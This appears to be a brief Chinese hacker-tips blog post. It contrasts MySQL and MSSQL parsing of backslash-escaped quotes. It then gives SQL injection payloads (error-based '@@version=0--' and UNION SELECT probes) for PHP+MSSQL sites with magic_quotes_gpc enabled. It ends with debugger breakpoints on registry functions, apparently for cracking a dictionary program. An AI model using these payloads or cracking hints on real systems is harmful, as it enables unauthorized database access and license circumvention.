|
tips 条件断点
|
在mysql中。
mysql> select * from z_admin where admin='admi\'';
Empty set (0.00 sec)
mysql> select * from z_admin where admin='admi\';
'> ';
Empty set (0.02 sec)
可以看到 这个语句是没法执行的。
select * from z_admin where admin='admi\'
应该是把\'解释成字符串中的单引号了,那么就缺少闭合的单引号。
----------------------不华丽的分割线-------------------------------------
而在mssql中。
select * from backupfile where filegroup_name='de\''
会出现这种情况。
服务器: 消息 105,级别 15,状态 1,行 1
字符串 'de\'
' 之前有未闭合的引号。
服务器: 消息 170,级别 15,状态 1,行 1
第 1 行: 'de\'
' 附近有语法错误。
select * from backupfile where filegroup_name='de\'
语句这样的话能顺利执行。
这说明 mssql是只鸳鸯啊,只要不是成对出现 就不让你执行,和mysql刚好相反。
有什么用呢????
我说一种,其他的自己琢磨。
在php+mssql的环境下 当magic_quotes_gpc==on时,不用管他。
开启错误提示的话 fuck.php?a=aaaaa' and @@version=0--
and后面随便跟什么语句慢慢来爆
没开错误提示的话。直接fuck.php?a=aaaaa' union select 1,2,3-- 慢慢猜吧
////////////////////////////////////////////////////
下注册表函数的断点。
在RegQueryValueExA处下条件断点:[esp+8]=="ProgData"&&[esp+14]!=0
在RegOpenKeyExA处下条件断点:[esp+8]=="Software\\EUsoft\\superdic"
 http://www.kyospace.com/feedcomm.asp?logID=341 |
KYO的地盘
